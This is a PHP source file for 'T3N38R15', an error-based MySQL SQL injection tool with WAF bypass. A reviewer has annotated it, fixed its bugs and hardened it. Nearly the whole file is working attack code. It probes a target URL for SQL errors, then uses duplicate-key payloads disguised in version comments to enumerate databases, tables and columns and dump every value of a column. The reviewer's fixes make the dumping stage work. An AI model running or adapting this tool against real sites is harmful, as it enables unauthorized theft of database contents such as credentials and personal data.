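<?php
/*
 * T3N38R15 "Error Based SQL Injector" (WAF-bypass variant).
 * Posted by Aerosol, 16 December 2014. Credits: T3N38R15 / Team M4DL33Ts.
 *
 * Purpose: given a URL that ends in an injectable GET parameter
 * (e.g. "http://host/index.php?id="), drive a MySQL error-based injection in
 * four POST stages; every stage prints clickable forms that post to the next:
 *   opt1  probe for "You have an error in your SQL syntax", choose the quote
 *         style ('1"', "1'" or '1'), read version()/user()/database() and
 *         list the schemata
 *   opt2  tables of one database          (nameinbase  = hex(db name))
 *   opt3  columns of one table            (nameinbase2 = hex(table name))
 *   opt4  values of one column            (nameinbase3 = hex(column name))
 * Values are leaked with the duplicate-key trick: GROUP BY on
 * concat(<value>, floor(rand(0)*2)) makes MySQL raise
 * "Duplicate entry '~value~1' for key 'group_key'" and the value is cut out
 * of the page text, so the target must print MySQL errors. The /*!50000
 * version-comment wrappers are executed by MySQL >= 5.0 and look like plain
 * comments to other parsers - that is the "WAF bypass" of the title.
 *
 * Review notes:
 *  - No authentication, no CSRF token on its forms, and it fetches whatever
 *    URL it is handed and relays the answer: hosted anywhere reachable this
 *    is an open SSRF/attack relay. Keep it on a local machine and use it
 *    only against systems you are authorized to test.
 *  - Everything printed comes from the operator or from the *target*
 *    database. A hostile target can answer with "<script>" as a table name,
 *    so all output is HTML-escaped here (the posted version echoed it raw).
 *  - Bugs fixed relative to the posted version: String2Hex() dropped the
 *    leading zero of bytes < 0x10 (hex pairs shifted, names garbled);
 *    GetSeperatorByInteger() switched on an undefined variable and always
 *    returned '' (stages 2-4 sent "id=+and(..."); the opt4 row query lacked
 *    the ")a" derived-table alias its sibling queries have; "hav?ing" typo;
 *    unclosed "</table"; LoadSite() had no timeout or redirect cap, returned
 *    an undefined variable when curl_init() failed and POSTed every request
 *    because isset($postdata) is true for ""; hex fields from $_POST were
 *    spliced into the query unchecked.
 *  - Needs PHP >= 5.4 (hex2bin, short arrays, ENT_SUBSTITUTE) + ext/curl.
 */

if (function_exists('set_time_limit')) {
    set_time_limit(0); // one request per row; the per-request cap lives in LoadSite()
}

/** HTML-escape for element text and double-quoted attributes (invalid UTF-8 becomes U+FFFD, not an empty string). */
function t3_esc($value)
{
    return htmlspecialchars((string) $value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** Print one hidden form field with name and value escaped. */
function t3_hidden($name, $value)
{
    echo '<input type="hidden" name="' . t3_esc($name) . '" value="' . t3_esc($value) . '">';
}

/** Print an escaped message and stop (the posted version crashed with notices or printed nothing here). */
function t3_fail($message)
{
    echo '<p>' . t3_esc($message) . '</p>';
    exit();
}

/** $_POST field as a string, '' when absent or not a scalar string. */
function t3_post($name)
{
    return isset($_POST[$name]) && is_string($_POST[$name]) ? $_POST[$name] : '';
}

/** Target URL from $_POST['url']; only absolute http(s) URLs, so curl cannot be pointed at file://, gopher:// etc. */
function t3_url_param()
{
    $url = trim(t3_post('url'));
    $scheme = strtolower((string) parse_url($url, PHP_URL_SCHEME));
    $host = (string) parse_url($url, PHP_URL_HOST);
    if ($host === '' || !in_array($scheme, ['http', 'https'], true)) {
        t3_fail('url must be an absolute http(s) URL ending in the injectable parameter');
    }
    return $url;
}

/** Hex-encoded identifier from $_POST (nameinbase*); it is spliced into the query as 0x<hex>, so anything else is rejected. */
function t3_hex_param($name)
{
    $hex = strtolower(t3_post($name));
    if ($hex === '' || strlen($hex) % 2 !== 0 || !ctype_xdigit($hex)) {
        t3_fail($name . ' must be a non-empty, even-length hex string');
    }
    return $hex;
}

/** Quote-style prefix for $_POST['seperator'] (1, 2 or 3); an unknown code aborts instead of sending a broken payload. */
function t3_seperator_param()
{
    $prefix = GetSeperatorByInteger(t3_post('seperator'));
    if ($prefix === '') {
        t3_fail('seperator must be 1, 2 or 3');
    }
    return $prefix;
}

/**
 * Cut the leaked pieces out of a MySQL "Duplicate entry '...' for key ..." message.
 * The payloads build the entry as ~'value'~<0|1> (or a~b~c~<0|1> with concat_ws),
 * so after dropping every single quote the text after the marker is split on '~':
 * [0] is what precedes the first '~', [1] the value, and so on.
 * Returns null when the page does not contain the marker.
 * Caveats: apostrophes inside the leaked value itself are stripped too (as in
 * the posted version). NOTE(review): MySQL shortens the entry it prints in this
 * message for long values, so long rows may come back truncated - not handled.
 */
function t3_extract_error($body)
{
    $marker = 'Duplicate entry';
    $pos = strpos($body, $marker);
    if ($pos === false) {
        return null;
    }
    $tail = substr($body, $pos + strlen($marker));
    return explode('~', str_replace("'", '', $tail));
}

/** Send $url.$payload and return the '~' pieces of the error (see t3_extract_error), or null. */
function t3_probe($url, $payload)
{
    return t3_extract_error(LoadSite($url . $payload, ''));
}

/** Piece $index of the leaked error, aborting when the target returned no usable error. */
function t3_leak($url, $payload, $index = 1)
{
    $pieces = t3_probe($url, $payload);
    if ($pieces === null || !isset($pieces[$index])) {
        t3_fail('no "Duplicate entry" error in the response to: ' . $payload);
    }
    return $pieces[$index];
}

/** Leaked count() as a non-negative int. */
function t3_leak_count($url, $payload)
{
    return max(0, (int) trim(t3_leak($url, $payload)));
}

/** Stage opt1: confirm the injection, show the banner, list databases (one request per name). */
function t3_stage_databases($url)
{
    $prefixes = ['1"', "1'", '1']; // index+1 is the code handed to stages 2-4 as 'seperator'

    // Does any quoting style break the query at all?
    $injectable = false;
    foreach ($prefixes as $prefix) {
        if (preg_match('#You have an error in your SQL syntax#', LoadSite($url . $prefix, '')) === 1) {
            $injectable = true;
            break;
        }
    }
    if (!$injectable) {
        t3_fail('no MySQL syntax error seen; the parameter is not injectable this way or errors are hidden');
    }

    // Which quoting style makes the duplicate-key trick fire?
    $seperator = '';
    $code = '';
    foreach ($prefixes as $idx => $prefix) {
        $page = LoadSite($url . $prefix . '+or+1+group+by+concat_ws(0x7e,version(),floor(rand(0)*2))+having+min(0)+or+1+--+f+--+', '');
        if (preg_match('#Duplicate entry#', $page) === 1) {
            $seperator = $prefix;
            $code = (string) ($idx + 1);
            break;
        }
    }
    if ($seperator === '') {
        echo 'NOTHING UP HERE';
        exit();
    }

    // Banner: concat_ws joins version()~user()~database()~<0|1>, so pieces 0..2 are the values.
    // (The posted version had "hav?ing" here, which MySQL rejects.)
    $banner = t3_probe($url, $seperator . '+or+1+group+by+concat_ws(0x7e,version(),user(),database(),floor(rand(0)*2))+having+min(0)+or+1+--+f+--+');
    if ($banner === null || count($banner) < 3) {
        t3_fail('could not read version()/user()/database()');
    }
    echo '<table><tr><td valign="top">';
    echo 'Version : ' . t3_esc(trim($banner[0])) . '<br>User : ' . t3_esc($banner[1]) . '<br>database : ' . t3_esc($banner[2]);

    $dbCount = t3_leak_count($url, $seperator . '+and(select+1+FROM(select+count(*),concat/*!50000*/((select+(select+(SELECT+distinct+Concat/*!50000*/(0x7e,0x27,count(schema_name),0x27,0x7e)+FROM+/*!information_schema.schemata*/+LIMIT+0,1))+FROM+/*!information_schema.tables*/+LIMIT+0,1),floor(rand(0)*2))x+FROM+/*!information_schema.tables*/+GROUP+BY+x)a)+--+f+--+');
    echo '<br>DbCount : ' . $dbCount . '<br></td><td><table border="3"><tr><td>Databases : </td></tr>';
    for ($i = 0; $i < $dbCount; $i++) {
        $db = t3_leak($url, $seperator . '+and(select+1+FROM(select+count(*),concat/*!50000*/((select+(select+(SELECT+distinct+Concat/*!50000*/(0x7e,0x27,CONVERT/*!50000(schema_name+USING+utf8)*/,0x27,0x7e)+FROM+/*!information_schema.schemata*/+LIMIT+' . $i . ',1))+FROM+/*!information_schema.tables*/+LIMIT+0,1),floor(rand(0)*2))x+FROM+/*!information_schema.tables*/+GROUP+BY+x)a)+--+f+--+');
        echo '<tr><td><form name="dt' . $i . '" method="post" target="_blank" style="display:inline">';
        echo '<div onclick="document.dt' . $i . '.submit()">' . t3_esc($db) . '</div>';
        t3_hidden('nameinbase', String2Hex($db));
        t3_hidden('url', $url);
        t3_hidden('opt2', '1');
        t3_hidden('seperator', $code);
        echo '</form></td></tr>';
    }
    echo '</table></td></tr></table>';
}

/** Stage opt2: tables of the database in nameinbase. */
function t3_stage_tables($url)
{
    $sepe = t3_seperator_param();
    $code = t3_post('seperator');
    $db = t3_hex_param('nameinbase');

    $total = t3_leak_count($url, $sepe . '+and(select+1+FROM(select+count(*),concat/*!50000*/((select+(select+(SELECT+concat+/*!50000*/(0x7e,0x27,count(table_name),0x27,0x7e)+FROM+/*!information_schema.tables*/+WHERE+table_schema=0x' . $db . '))+FROM+/*!information_schema.tables+LIMIT*/+0,1),floor(rand(0)*2))x+FROM/*!50000information_schema.tables*/+GROUP+BY+x)a)+--+f+--+');
    echo '<table border="3"><tr><td>Tables From ' . t3_esc(Hex2String($db)) . ' : (Total: ' . $total . ') </td></tr>';
    for ($i = 0; $i < $total; $i++) {
        $table = t3_leak($url, $sepe . '+and(select+1+FROM(select+count(*),concat/*!50000*/((select+(select+(SELECT+distinct+concat/*!50000*/(0x7e,0x27,CONVERT/*!50000(table_name+USING+utf8)*/,0x27,0x7e)+FROM+/*!information_schema.tables*/+WHERE+table_schema=0x' . $db . '+LIMIT+' . $i . ',1))+FROM+/*!information_schema.tables*/+LIMIT+0,1),floor(rand(0)*2))x+FROM+/*!information_schema.tables*/+GROUP+BY+x)a)+--+f+--+');
        echo '<tr><td><form name="dt' . $i . '" method="post" target="_blank" style="display:inline">';
        echo '<div onclick="document.dt' . $i . '.submit()">' . t3_esc($table) . '</div>';
        t3_hidden('nameinbase', $db);
        t3_hidden('nameinbase2', String2Hex($table));
        t3_hidden('url', $url);
        t3_hidden('opt3', '1');
        t3_hidden('seperator', $code);
        echo '</form></td></tr>';
    }
    echo '</table>';
}

/** Stage opt3: columns of table nameinbase2 in database nameinbase. */
function t3_stage_columns($url)
{
    $sepe = t3_seperator_param();
    $code = t3_post('seperator');
    $db = t3_hex_param('nameinbase');
    $table = t3_hex_param('nameinbase2');

    $total = t3_leak_count($url, $sepe . '+and(select+1+FROM(select+count(*),concat/*!50000*/((select+(select+(SELECT+concat+/*!50000*/(0x7e,0x27,count(column_name),0x27,0x7e)+FROM+/*!information_schema.columns*/+WHERE+table_schema=0x' . $db . '+AND+table_name=0x' . $table . '))+FROM+/*!information_schema.tables+LIMIT*/+0,1),floor(rand(0)*2))x+FROM/*!50000information_schema.tables*/+GROUP+BY+x)a)+--+f+--+');
    echo '<table border="3"><tr><td>columns from ' . t3_esc(Hex2String($table)) . ' in Database ' . t3_esc(Hex2String($db)) . ' (Total: ' . $total . ')</td></tr>';
    for ($i = 0; $i < $total; $i++) {
        $column = t3_leak($url, $sepe . '+and(select+1+FROM(select+count(*),concat/*!50000*/((select+(select+(select+distinct+concat/*!50000*/(0x7e,0x27,CONVERT/*!50000+(column_name+USING+utf8)*/,0x27,0x7e)+FROM+/*!50000information_schema.columns*/+WHERE+table_schema=0x' . $db . '+AND+table_name=0x' . $table . '+LIMIT+' . $i . ',1))+FROM+/*!50000information_schema.tables*/+LIMIT+0,1),floor(rand(0)*2))x+FROM+/*!50000information_schema.tables*/+GROUP+BY+x)a)+--+f+--+');
        echo '<tr><td><form name="dt' . $i . '" method="post" target="_blank" style="display:inline">';
        echo '<div onclick="document.dt' . $i . '.submit()">' . t3_esc($column) . '</div>';
        t3_hidden('nameinbase', $db);
        t3_hidden('nameinbase2', $table);
        t3_hidden('nameinbase3', String2Hex($column));
        t3_hidden('url', $url);
        t3_hidden('opt4', '1');
        t3_hidden('seperator', $code);
        echo '</form></td></tr>';
    }
    echo '</table>';
}

/**
 * Stage opt4: every value of column nameinbase3 in nameinbase.nameinbase2.
 * The three identifiers are decoded and written into the URL verbatim, as in
 * the posted version, so names containing spaces or URL metacharacters will
 * not survive the trip.
 */
function t3_stage_rows($url)
{
    $sepe = t3_seperator_param();
    $db = Hex2String(t3_hex_param('nameinbase'));
    $table = Hex2String(t3_hex_param('nameinbase2'));
    $column = Hex2String(t3_hex_param('nameinbase3'));

    $total = t3_leak_count($url, $sepe . '+and(select+1+FROM(select+count(*),concat/*!50000*/((select+(select+(SELECT+concat+/*!50000*/(0x7e,0x27,count(' . $column . '),0x27,0x7e)+FROM+' . $db . '.' . $table . '))+FROM+/*!information_schema.tables+LIMIT*/+0,1),floor(rand(0)*2))x+FROM/*!50000information_schema.tables*/+GROUP+BY+x)a)+--+f+--+');
    echo '<table border="3"><tr><td>Items : (Total: ' . $total . ')</td></tr>';
    for ($i = 0; $i < $total; $i++) {
        // ")a)" closes the derived table and gives it the alias MySQL demands, like every other
        // query in this file; the posted version stopped at ")" here and so never dumped a row.
        $value = t3_leak($url, $sepe . '+and+(select+1+FROM(select+count(*),concat/*!50000*/((select+concat/*!50000*/(0x7e,0x27,' . $column . ',0x27,0x7e)+FROM+' . $db . '.' . $table . '+LIMIT+' . $i . ',1),floor(rand(0)*2))x+FROM+/*!information_schema.tables*/+GROUP+BY+x)a)+--+f+--+');
        echo '<tr><td>' . $i . '</td><td>' . t3_esc($value) . '</td></tr>';
    }
    echo '</table>';
}

/** The landing page: a single URL field posting opt1=1. */
function t3_render_form()
{
    echo <<<'HTML'
<html><head><title>T3N38R15 Injector for WAF Bypass</title>
<style type="text/css">#sbz {text-align: center;color: #000;font-size: 20px;font-weight: bold;line-height: 0.8em;letter-spacing: 0.2em;margin:0;text-shadow: 0 1px 20px #00FF00, 0 0 5px #00FF00, 0 0px 30px #00FF00, 1px 0 3px #00FF00;}</style>
</head><body>
<b id="sbz"><font size="100"><br>T3N38R15<br><br><br>Error Based SQL Injector<br><br><br></font></b>
<form method="post"><input size="80" name="url" value="http://example.com/index.php?id="><input value="inject" type="submit"><input type="hidden" name="opt1" value="1"></form>
<br>Greets to Team M4DL33Ts
</body></html>
HTML;
}

/**
 * Map the stage code carried in $_POST['seperator'] (1, 2 or 3) back to the
 * quote-style prefix chosen in stage opt1; '' for any other code.
 * The posted version switched on the undefined $seperator instead of $int,
 * so it always returned '' and stages 2-4 never produced a valid query.
 */
function GetSeperatorByInteger($int)
{
    switch ((string) $int) {
        case '1':
            return '1"';
        case '2':
            return "1'";
        case '3':
            return '1';
    }
    return '';
}

/**
 * Lowercase hex of every byte of $string, two digits per byte.
 * The posted version used dechex(ord()) without padding, so bytes below 0x10
 * produced one digit and every later pair read by Hex2String() was shifted.
 */
function String2Hex($string)
{
    return bin2hex((string) $string);
}

/**
 * Inverse of String2Hex(). Returns '' for an empty, odd-length or non-hex
 * input (the posted version fed such input to hexdec() and produced garbage).
 */
function Hex2String($hex)
{
    $hex = (string) $hex;
    if ($hex === '' || strlen($hex) % 2 !== 0 || !ctype_xdigit($hex)) {
        return '';
    }
    return hex2bin($hex);
}

/**
 * Fetch $url with a browser-like User-Agent and return the body as a string
 * ('' on any curl failure, so callers can always preg_match it).
 * $postdata: when non-empty the request is a POST with that body; otherwise a
 * plain GET. (The posted version tested isset($postdata), which is true for
 * the "" every caller passes, so it POSTed an empty body on every probe.)
 * Redirects are followed but capped, and each request is bounded in time -
 * with set_time_limit(0) above nothing else would ever stop a hung target.
 */
function LoadSite($url, $postdata)
{
    $agent = "Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0";
    $ch = curl_init($url);
    if (!$ch) {
        return '';
    }
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_USERAGENT, $agent);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
    curl_setopt($ch, CURLOPT_MAXREDIRS, 5);
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
    curl_setopt($ch, CURLOPT_TIMEOUT, 30);
    if (defined('CURLOPT_PROTOCOLS')) {
        // Never let the operator or a redirect turn this into a file:// or gopher:// reader.
        curl_setopt($ch, CURLOPT_PROTOCOLS, CURLPROTO_HTTP | CURLPROTO_HTTPS);
        curl_setopt($ch, CURLOPT_REDIR_PROTOCOLS, CURLPROTO_HTTP | CURLPROTO_HTTPS);
    }
    if ($postdata !== null && $postdata !== '') {
        curl_setopt($ch, CURLOPT_POST, true);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $postdata);
    }
    $body = curl_exec($ch);
    curl_close($ch);
    return is_string($body) ? $body : '';
}

// Dispatch: the first opt1..opt4 flag present picks the stage; without one, show the form.
if (!headers_sent()) {
    header('Content-Type: text/html; charset=UTF-8'); // the escaping above assumes the browser decodes as UTF-8
}
$stages = [
    'opt1' => 't3_stage_databases',
    'opt2' => 't3_stage_tables',
    'opt3' => 't3_stage_columns',
    'opt4' => 't3_stage_rows',
];
$stage = null;
foreach ($stages as $flag => $handler) {
    if (!empty($_POST[$flag])) {
        $stage = $handler;
        break;
    }
}
if ($stage === null) {
    t3_render_form();
} else {
    $stage(t3_url_param());
}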